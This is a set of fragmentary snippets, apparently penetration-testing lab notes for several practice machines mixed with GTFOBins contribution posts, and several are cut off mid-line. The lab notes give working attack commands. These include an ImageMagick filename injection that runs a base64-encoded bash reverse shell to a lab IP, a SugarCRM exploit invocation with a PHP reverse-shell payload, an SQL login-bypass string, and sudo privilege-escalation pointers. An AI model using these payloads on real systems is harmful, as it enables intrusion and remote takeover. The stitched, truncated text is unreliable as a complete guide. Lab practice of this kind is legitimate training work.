-
Key points:
- ImageMagick 6.9.6 exploit info to reverse shell
`cp image.jpg '|smile"echo L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ1LjE4Mi80NDQ0IDA+JjE=|base64 -d|bash".jpg'`
- strace (https://gt…
-
Key points:
- PDFKit exploit --> https://www.exploit-db.com/exploits/51293 (pdfkit v0.8.7.2 - Command Injection)
- [PE] ruby -->https://gtfobins.github.io/gtfobins/ruby/#sudo
-
Keypoints:
- Click send button in the contact forum filed --> Get CMS info --> find exploit info
[PE]
1. pspy64 ->
![image](https://github.com/user-attachments/assets/2f807e03-d4d4-4f85-b4e5-528e…
-
Keypoints:
- SugarCRM 7.12 --> CVE-2023-22952: https://github.com/manuelz120/CVE-2022-23940
` python3 exploit.py -h http://192.168.214.146 -u admin -p admin --payload "php -r '\$sock=fsockopen(\"19…
-
Hello, I would like to make a few contributions, but it's hard for me to determine if it truly falls under "Argument/Parameter injection". I get the concept but I'm not sure there is much distinction …
-
The GTFOBins project _[Get The F**k Out Binaries]_ list binaries / commands / arguments which will allow for privilege escalation in a **Linux** environment:
[GTFOBins Project Page](https://gtfobin…
-
Keypoints:
- Flatpress 1.2.1 - File upload bypass to RCE Vulnerebility
- [PE] [apt-get ](https://gtfobins.github.io/gtfobins/apt-get/)
-
**Name the program name**
nc or netcat
**Describe the context of the usage**
Executing nc with the -l flag let it listen on an arbitrary port and receive data. Older/traditional versions of nc us…
-
-
Keypoints:
- SQL login bypass `'OR '' = '` (https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/Databases/MySQL-SQLi-Login-Bypass.fuzzdb.txt)
- Add public key into webpage --> then, SSH l…